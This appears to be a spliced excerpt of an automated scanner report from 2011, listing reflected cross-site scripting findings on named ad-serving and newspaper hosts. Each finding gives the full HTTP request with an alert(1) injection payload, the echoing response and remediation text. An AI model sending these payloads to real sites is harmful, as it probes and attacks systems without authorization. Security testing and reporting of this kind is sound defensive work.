GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=98aa1'%3balert(1)//71dd49f8f74&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:98aa1';alert(1)//71dd49f8f74;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2512

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat=',98aa1';alert(1)//71dd49f8f74';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,98aa1';alert(1)//71dd49f8f74;z="+Math.random();}
1.91. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://c7.zedo.com
Path: /bar/v16-401/c5/jsc/fmr.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce34c'-alert(1)-'2c607e7cd20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?ce34c'-alert(1)-'2c607e7cd20=1 HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1220,175,9:1220,175,14; ZFFAbh=749B826,20|1483_759#365; FFad=1:1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 986
Content-Type: application/x-javascript
Set-Cookie: FFad=0:1:1;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,175,9:1220,175,14;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=403
Expires: Thu, 03 Feb 2011 16:18:54 GMT
Date: Thu, 03 Feb 2011 16:12:11 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7cb1'%3balert(1)//8a1d92bd133 was submitted in the q parameter. This input was echoed as c7cb1';alert(1)//8a1d92bd133 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=c7cb1'%3balert(1)//8a1d92bd133&$=&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=126
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:58 GMT
Connection: close
Content-Length: 2509
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='c7cb1';alert(1)//8a1d92bd133';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=c7cb1';alert(1)//8a1d92bd133;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2059a"%3balert(1)//3c744e65e36 was submitted in the q parameter. This input was echoed as 2059a";alert(1)//3c744e65e36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=2059a"%3balert(1)//3c744e65e36&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=126
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:58 GMT
Connection: close
Content-Length: 2509
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='2059a";alert(1)//3c744e65e36';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=2059a";alert(1)//3c744e65e36;z="+Math.random();}
The value of the CMP request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87dce'%3balert(1)//cd49a21da3a was submitted in the CMP parameter. This input was echoed as 87dce';alert(1)//cd49a21da3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the css request parameter is copied into the HTML document as plain text between tags. The payload 8d4ab<script>alert(1)</script>26bbc880e6b was submitted in the css parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site8d4ab<script>alert(1)</script>26bbc880e6b&scode=ocregister HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:46 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 19:04:46 GMT
ETag: "3e96ae5b9a43fcda3ef515d03304a9d6-80952"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:04:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/css
Content-Length: 80952
/* Reset styles for browser compatibility */ body, th, td, p, div { font-family:Arial, Helvetica, sans-serif; } html,ul,ol,li,h1,h2,h3 ...[SNIP]...
1.96. http://common.cdn.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://common.cdn.onset.freedom.com
Path: /tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c071b<script>alert(1)</script>68b91996e9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c071b<script>alert(1)</script>68b91996e9f=1 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:50 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 19:04:50 GMT
ETag: "c833a993b4a7a934d84484ad93124520-86888"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:04:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/css
Content-Length: 86888
The value of the scode request parameter is copied into the HTML document as plain text between tags. The payload 8d317<script>alert(1)</script>6d5518f0373 was submitted in the scode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister8d317<script>alert(1)</script>6d5518f0373 HTTP/1.1
Host: common.cdn.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:47 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 19:04:49 GMT
ETag: "63029f1bf18ce33fe44a9bdae196c917-22441"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 19:04:47 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/css
Content-Length: 22441
/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister8d317<script>alert(1)</script>6d5518f0373 */ /*generic freedom site styles, take layout.css styles and define fonts, background images, etc */
/* define page areas */ body { font-family: Arial, Helvetica, sans-serif; font-size: 100%; ...[SNIP]...
The value of the ctype request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1014d"%3balert(1)//21a83927387 was submitted in the ctype parameter. This input was echoed as 1014d";alert(1)//21a83927387 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.com&ctype=error1014d"%3balert(1)//21a83927387&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:44 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n19), ms iad-agg-n19 ( sfo-agg-n1), ms sfo-agg-n1 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:54:45 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28742
var fiChildSAccount="fiocregister";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */
...[SNIP]... rn new s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}
The value of the domain request parameter is copied into a JavaScript inline comment. The payload d8ddc*/alert(1)//26af18f6098 was submitted in the domain parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.comd8ddc*/alert(1)//26af18f6098&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:41 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n7), ms iad-agg-n7 ( sfo-agg-n28), ms sfo-agg-n28 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:54:41 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28807
var fiChildSAccount="fiocregister";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */
/** referer=http://mortgage.ocregister.com/feeda71cd%22%3e%3cscript%3ealert(1)%3c/script%3e1f35e8c0ea2/ **/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() ...[SNIP]...
The value of the domain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9298"%3balert(1)//3579af22c1e was submitted in the domain parameter. This input was echoed as e9298";alert(1)//3579af22c1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.come9298"%3balert(1)//3579af22c1e&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:40 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n5), ms iad-agg-n5 ( sfo-agg-n34), ms sfo-agg-n34 ( origin)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:54:40 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28807
var fiChildSAccount="fiocregister";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */
...[SNIP]... <0){eval(c);return new s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}
The value of the ghier request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aca8c"%3b4150865a2c4 was submitted in the ghier parameter. This input was echoed as aca8c";4150865a2c4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.com&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogsaca8c"%3b4150865a2c4 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:55:05 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n28), ms iad-agg-n28 ( sfo-agg-n7), ms sfo-agg-n7 ( origin>CONN)
Cache-Control: max-age=7200
Expires: Thu, 03 Feb 2011 20:55:05 GMT
Age: 0
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 28761
var fiChildSAccount="fiocregister";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */
The value of the css request parameter is copied into the HTML document as plain text between tags. The payload 2441a<script>alert(1)</script>3c82a873a6e was submitted in the css parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site2441a<script>alert(1)</script>3c82a873a6e&scode=ocregister HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:29 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n6), ms iad-agg-n6 ( sfo-agg-n45), ms sfo-agg-n45 ( origin)
ETag: "f4f38c4aee23a73f09d77826215df995-80952"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:29 GMT
Age: 0
Content-Type: text/css
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:29 GMT
Connection: keep-alive
Content-Length: 80952
The value of the js request parameter is copied into the HTML document as plain text between tags. The payload 56f76<script>alert(1)</script>f1eb6477288 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?js=56f76<script>alert(1)</script>f1eb6477288&scode=ocregister HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:25 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n5), ms iad-agg-n5 ( sfo-agg-n40), ms sfo-agg-n40 ( origin)
ETag: "f9bfbcc84f8fc00f069b546540ef24b0-119"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:25 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
